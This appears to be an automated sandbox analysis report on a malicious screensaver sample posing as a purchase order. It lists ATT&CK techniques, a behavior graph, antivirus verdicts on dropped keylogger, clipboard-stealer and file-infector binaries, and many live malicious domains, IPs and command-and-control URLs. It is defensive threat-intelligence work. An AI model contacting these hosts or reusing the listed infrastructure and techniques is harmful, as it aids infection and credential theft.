                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc Filesystem1
                  Remote System Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591772 Sample: PO#_1100015533.scr Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 79 zlenh.biz 2->79 81 ww7.przvgke.biz 2->81 83 13 other IPs or domains 2->83 125 Suricata IDS alerts for network traffic 2->125 127 Malicious sample detected (through community Yara rule) 2->127 129 Antivirus detection for URL or domain 2->129 131 13 other signatures 2->131 9 PO#_1100015533.scr 1 11 2->9         started        13 armsvc.exe 2->13         started        16 taskeng.exe 1 2->16         started        18 14 other processes 2->18 signatures3 process4 dnsIp5 65 C:\Users\user\AppData\Roaming\hVVSnrrP.exe, PE32 9->65 dropped 67 C:\Users\...\hVVSnrrP.exe:Zone.Identifier, ASCII 9->67 dropped 69 C:\Users\user\AppData\Local\...\tmpB6F1.tmp, XML 9->69 dropped 147 Uses schtasks.exe or at.exe to add and modify task schedules 9->147 149 Adds a directory exclusion to Windows Defender 9->149 151 Injects a PE file into a foreign processes 9->151 20 PO#_1100015533.scr 6 9->20         started        25 powershell.exe 4 9->25         started        27 powershell.exe 4 9->27         started        29 schtasks.exe 9->29         started        101 ww7.fwiwk.biz 13->101 103 ww12.fwiwk.biz 13->103 105 32 other IPs or domains 13->105 71 C:\Windows\ehome\ehsched.exe, PE32+ 13->71 dropped 73 C:\Windows\ehome\ehrecvr.exe, PE32+ 13->73 dropped 75 C:\Windows\System32\wbengine.exe, PE32+ 13->75 dropped 77 22 other malicious files 13->77 dropped 153 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->153 155 Searches for Windows Mail specific files 13->155 157 Infects executable files (exe, dll, sys, html) 13->157 31 hVVSnrrP.exe 4 16->31         started        159 Antivirus detection for dropped file 18->159 161 Creates files inside the volume driver (system volume information) 18->161 163 Machine Learning detection for dropped file 18->163 file6 signatures7 process8 dnsIp9 85 cvgrf.biz 54.244.188.177, 49163, 49164, 49167 AMAZON-02US United States 20->85 87 pywolwnvd.biz 20->87 57 C:\Windows\System32\alg.exe, PE32+ 20->57 dropped 59 C:\Windows\...\FlashPlayerUpdateService.exe, PE32 20->59 dropped 61 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 20->61 dropped 63 2 other malicious files 20->63 dropped 133 Drops executable to a common third party application directory 20->133 135 Infects executable files (exe, dll, sys, html) 20->135 33 Trading_AIBot.exe 20->33         started        37 Microsofts.exe 20->37         started        137 Installs new ROOT certificates 25->137 139 Antivirus detection for dropped file 31->139 141 Multi AV Scanner detection for dropped file 31->141 143 Machine Learning detection for dropped file 31->143 145 2 other signatures 31->145 40 hVVSnrrP.exe 31->40         started        42 powershell.exe 31->42         started        44 powershell.exe 31->44         started        46 4 other processes 31->46 file10 signatures11 process12 dnsIp13 55 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 33->55 dropped 109 Antivirus detection for dropped file 33->109 111 Multi AV Scanner detection for dropped file 33->111 113 Machine Learning detection for dropped file 33->113 123 2 other signatures 33->123 48 apihost.exe 33->48         started        51 powershell.exe 33->51         started        53 schtasks.exe 33->53         started        89 reallyfreegeoip.org 37->89 91 checkip.dyndns.com 193.122.130.0, 49166, 80 ORACLE-BMC-31898US United States 37->91 97 2 other IPs or domains 37->97 115 Installs new ROOT certificates 37->115 117 Tries to steal Mail credentials (via file / registry access) 37->117 119 Tries to harvest and steal browser information (history, passwords, etc) 37->119 93 13.248.148.254, 49192, 80 AMAZON-02US United States 40->93 95 ww7.przvgke.biz 40->95 99 8 other IPs or domains 40->99 file14 121 Tries to detect the country of the analysis system (by using the IP) 89->121 signatures15 process16 signatures17 107 Antivirus detection for dropped file 48->107

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PO#_1100015533.scr32%VirustotalBrowse
                  PO#_1100015533.scr21%ReversingLabs
                  PO#_1100015533.scr100%AviraHEUR/AGEN.1311126
                  PO#_1100015533.scr100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe100%AviraW32/Infector.Gen
                  C:\Users\user\AppData\Roaming\hVVSnrrP.exe100%AviraHEUR/AGEN.1311126
                  C:\Windows\System32\SearchIndexer.exe100%AviraW32/Infector.Gen
                  C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE100%AviraW32/Infector.Gen
                  C:\Users\user\AppData\Local\Temp\Microsofts.exe100%AviraTR/ATRAPS.Gen
                  C:\Windows\System32\VSSVC.exe100%AviraW32/Infector.Gen
                  C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                  C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe100%AviraW32/Infector.Gen
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%AviraW32/Infector.Gen
                  C:\Windows\System32\FXSSVC.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                  C:\Program Files\Windows Media Player\wmpnetwk.exe100%AviraW32/Infector.Gen
                  C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe100%AviraW32/Infector.Gen
                  C:\Windows\System32\Locator.exe100%AviraW32/Infector.Gen
                  C:\Windows\SysWOW64\perfhost.exe100%AviraW32/Infector.Gen
                  C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%AviraW32/Infector.Gen
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%AviraW32/Infector.Gen
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe100%AviraW32/Infector.Gen
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\hVVSnrrP.exe100%Joe Sandbox ML
                  C:\Windows\System32\SearchIndexer.exe100%Joe Sandbox ML
                  C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Microsofts.exe100%Joe Sandbox ML
                  C:\Windows\System32\VSSVC.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe100%Joe Sandbox ML
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%Joe Sandbox ML
                  C:\Windows\System32\FXSSVC.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                  C:\Program Files\Windows Media Player\wmpnetwk.exe100%Joe Sandbox ML
                  C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe100%Joe Sandbox ML
                  C:\Windows\System32\Locator.exe100%Joe Sandbox ML
                  C:\Windows\SysWOW64\perfhost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%Joe Sandbox ML
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%Joe Sandbox ML
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Microsofts.exe91%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                  C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe92%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                  C:\Users\user\AppData\Roaming\hVVSnrrP.exe21%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://reallyfreegeoip.orgX0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640100%Avira URL Cloudmalware
                  http://72.52.178.23/ayokafkcxduc0%Avira URL Cloudsafe
                  http://54.244.188.177/rmrhacpx100%Avira URL Cloudmalware
                  http://ww7.przvgke.biz/100%Avira URL Cloudmalware
                  http://.exe0%Avira URL Cloudsafe
                  https://trkpcna.net/track.0%Avira URL Cloudsafe
                  http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459100%Avira URL Cloudmalware
                  http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400100%Avira URL Cloudphishing
                  http://54.244.188.177/crsFLLcp100%Avira URL Cloudmalware
                  http://54.244.188.177/rmrhacpxL100%Avira URL Cloudmalware
                  http://82.112.184.197/yhhdkvr0%Avira URL Cloudsafe
                  http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640Cb100%Avira URL Cloudmalware
                  http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccep100%Avira URL Cloudmalware
                  http://checkip.dyndns.comX0%Avira URL Cloudsafe
                  http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OW100%Avira URL Cloudphishing
                  http://54.244.188.177/crs100%Avira URL Cloudmalware
                  http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613100%Avira URL Cloudphishing
                  http://82.112.184.197/savrhhv0%Avira URL Cloudsafe
                  http://checkip.dyndns.orgX0%Avira URL Cloudsafe
                  http://35.164.78.200/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  76899.bodis.com
                  		199.59.243.228
                  		truefalse
                    		high
                    oshhkdluh.biz
                    		54.244.188.177
                    		truefalse
                      		high
                      jpskm.biz
                      		18.246.231.120
                      		truefalse
                        		high
                        vjaxhpbji.biz
                        		82.112.184.197
                        		truefalse
                          		high
                          pywolwnvd.biz
                          		54.244.188.177
                          		truefalse
                            		high
                            ifsaia.biz
                            		13.251.16.150
                            		truefalse
                              		high
                              ytctnunms.biz
                              		3.94.10.34
                              		truefalse
                                		high
                                lrxdmhrr.biz
                                		54.244.188.177
                                		truefalse
                                  		high
                                  tbjrpv.biz
                                  		34.246.200.160
                                  		truefalse
                                    		high
                                    saytjshyf.biz
                                    		44.221.84.105
                                    		truefalse
                                      		high
                                      084725.parkingcrew.net
                                      		76.223.26.96
                                      		truefalse
                                        		high
                                        xlfhhhm.biz
                                        		47.129.31.212
                                        		truefalse
                                          		high
                                          fwiwk.biz
                                          		72.52.178.23
                                          		truefalse
                                            		high
                                            npukfztj.biz
                                            		44.221.84.105
                                            		truefalse
                                              		high
                                              przvgke.biz
                                              		72.52.178.23
                                              		truefalse
                                                		high
                                                dwrqljrr.biz
                                                		54.244.188.177
                                                		truefalse
                                                  		high
                                                  myups.biz
                                                  		165.160.13.20
                                                  		truefalse
                                                    		high
                                                    gytujflc.biz
                                                    		208.117.43.225
                                                    		truefalse
                                                      		high
                                                      ssbzmoy.biz
                                                      		18.141.10.107
                                                      		truefalse
                                                        		high
                                                        knjghuig.biz
                                                        		18.141.10.107
                                                        		truefalse
                                                          		high
                                                          yunalwv.biz
                                                          		208.117.43.225
                                                          		truefalse
                                                            		high
                                                            reallyfreegeoip.org
                                                            		104.21.80.1
                                                            		truefalse
                                                              		high
                                                              deoci.biz
                                                              		34.227.7.138
                                                              		truefalse
                                                                		high
                                                                checkip.dyndns.com
                                                                		193.122.130.0
                                                                		truefalse
                                                                  		high
                                                                  nqwjmb.biz
                                                                  		35.164.78.200
                                                                  		truefalse
                                                                    		high
                                                                    cvgrf.biz
                                                                    		54.244.188.177
                                                                    		truefalse
                                                                      		high
                                                                      qaynky.biz
                                                                      		13.251.16.150
                                                                      		truefalse
                                                                        		high
                                                                        lpuegx.biz
                                                                        		82.112.184.197
                                                                        		truefalse
                                                                          		high
                                                                          bumxkqgxu.biz
                                                                          		44.221.84.105
                                                                          		truefalse
                                                                            		high
                                                                            vcddkls.biz
                                                                            		18.141.10.107
                                                                            		truefalse
                                                                              		high
                                                                              ww12.fwiwk.biz
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                checkip.dyndns.org
                                                                                		unknown
                                                                                		unknownfalse
                                                                                  		high
                                                                                  uhxqin.biz
                                                                                  		unknown
                                                                                  		unknownfalse
                                                                                    		high
                                                                                    anpmnmxo.biz
                                                                                    		unknown
                                                                                    		unknownfalse
                                                                                      		high
                                                                                      ww7.przvgke.biz
                                                                                      		unknown
                                                                                      		unknownfalse
                                                                                        		high
                                                                                        ww7.fwiwk.biz
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          zlenh.biz
                                                                                          		unknown
                                                                                          		unknownfalse
                                                                                            		high
                                                                                            ww12.przvgke.biz
                                                                                            		unknown
                                                                                            		unknownfalse
                                                                                              		high

                                                                                              Contacted URLs

                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                                                                                		high
                                                                                                http://myups.biz/dfalse
                                                                                                  		high
                                                                                                  http://yunalwv.biz/egblfalse
                                                                                                    		high
                                                                                                    http://cvgrf.biz/mlvmnwkfalse
                                                                                                      		high
                                                                                                      http://przvgke.biz/ayokafkcxducfalse
                                                                                                        		high
                                                                                                        http://checkip.dyndns.org/false
                                                                                                          		high
                                                                                                          http://nqwjmb.biz/uihfupcxtfalse
                                                                                                            		high
                                                                                                            http://dwrqljrr.biz/bcafsfattyjokwifalse
                                                                                                              		high
                                                                                                              http://npukfztj.biz/jyfalse
                                                                                                                		high
                                                                                                                http://knjghuig.biz/mspaifalse
                                                                                                                  		high
                                                                                                                  http://npukfztj.biz/kafalse
                                                                                                                    		high
                                                                                                                    http://qaynky.biz/ekhmfomfalse
                                                                                                                      		high
                                                                                                                      http://pywolwnvd.biz/xvuqxulkihfalse
                                                                                                                        		high
                                                                                                                        http://jpskm.biz/njuvyxgvhbfalse
                                                                                                                          		high
                                                                                                                          http://vjaxhpbji.biz/yhhdkvrfalse
                                                                                                                            		high
                                                                                                                            http://pywolwnvd.biz/crsfalse
                                                                                                                              		high
                                                                                                                              http://przvgke.biz/tbjnflaqienlofabfalse
                                                                                                                                		high
                                                                                                                                http://oshhkdluh.biz/nqxtonfalse
                                                                                                                                  		high
                                                                                                                                  http://ssbzmoy.biz/xatwldmnplfalse
                                                                                                                                    		high
                                                                                                                                    http://yunalwv.biz/vattrqgfalse
                                                                                                                                      		high
                                                                                                                                      http://cvgrf.biz/agmftfyaknffalse
                                                                                                                                        		high
                                                                                                                                        http://lpuegx.biz/kieltrnsmfalse
                                                                                                                                          		high
                                                                                                                                          http://lpuegx.biz/tehaooqfalse
                                                                                                                                            		high
                                                                                                                                            http://myups.biz/cufthfalse
                                                                                                                                              		high
                                                                                                                                              http://knjghuig.biz/dcbbaoyhlxdmixfalse
                                                                                                                                                		high
                                                                                                                                                http://ssbzmoy.biz/bjyjakehonafotkdfalse
                                                                                                                                                  		high
                                                                                                                                                  http://lpuegx.biz/mfalse
                                                                                                                                                    		high
                                                                                                                                                    http://vjaxhpbji.biz/qpqnetypfalse
                                                                                                                                                      		high
                                                                                                                                                      http://ytctnunms.biz/qgbipxbufalse
                                                                                                                                                        		high
                                                                                                                                                        http://przvgke.biz/offalse
                                                                                                                                                          		high
                                                                                                                                                          http://gytujflc.biz/fmxntfwxlcjyowfalse
                                                                                                                                                            		high
                                                                                                                                                            http://lrxdmhrr.biz/rmrhacpxfalse
                                                                                                                                                              		high
                                                                                                                                                              http://ssbzmoy.biz/rgsfalse
                                                                                                                                                                		high
                                                                                                                                                                http://vjaxhpbji.biz/savrhhvfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://saytjshyf.biz/kskvulsyfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://cvgrf.biz/euichtddofalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://przvgke.biz/bhikwfegywkkepufalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://vjaxhpbji.biz/fekpygnafalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://gytujflc.biz/dwwujsrodteumfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://pywolwnvd.biz/jfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://lpuegx.biz/mgjwfjfoigllfjqdfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://fwiwk.biz/qdyfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://vcddkls.biz/gsqrdfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://fwiwk.biz/lderrmfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://bumxkqgxu.biz/tgbpchottuabpqdqfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://xlfhhhm.biz/wuwlkmskplfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://przvgke.biz/wqgsdflawiqutfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://npukfztj.biz/uxiijwubfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://przvgke.biz/vpavfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://ifsaia.biz/uknkrwvskelclnbwfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tbjrpv.biz/wuafalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://pywolwnvd.biz/bqjjhsnkosjsofalse
                                                                                                                                                                                                      		high

                                                                                                                                                                                                      URLs from Memory and Binaries

                                                                                                                                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                      http://reallyfreegeoip.orgXMicrosofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://trkpcna.net/track.armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://reallyfreegeoip.org/xml/8.46.123.189XMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://www.diginotar.nl/cps/pkioverheid0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://www.google.comarmsvc.exe, 0000000B.00000003.602188957.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.393870874.0000000002470000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.391699512.0000000001F00000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.393845500.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.392632097.00000000023E0000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://checkip.dyndns.org/qPO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://checkip.dyndns.org/XMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://72.52.178.23/ayokafkcxduchVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO#_1100015533.scr, 00000000.00000002.386365175.0000000002931000.00000004.00000800.00020000.00000000.sdmp, hVVSnrrP.exe, 0000000A.00000002.577498436.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.401578021.0000000002141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://ww7.przvgke.biz/hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      https://reallyfreegeoip.org/xml/PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/encoding/armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=fwiwk.bizarmsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://contoso.com/Iconpowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://checkip.dyndns.orgMicrosofts.exe, 0000000E.00000002.643206935.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://54.244.188.177/rmrhacpxarmsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                https://reallyfreegeoip.orgMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://crl.entrust.net/2048ca.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://54.244.188.177/crsFLLcpPO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://.exearmsvc.exe, 0000000B.00000003.585874459.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://ocsp.entrust.net03Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://54.244.188.177/rmrhacpxLarmsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640CbhVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://82.112.184.197/yhhdkvrarmsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccephVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          https://contoso.com/powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            http://54.244.188.177/crsPO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://reallyfreegeoip.orgMicrosofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmpfalse
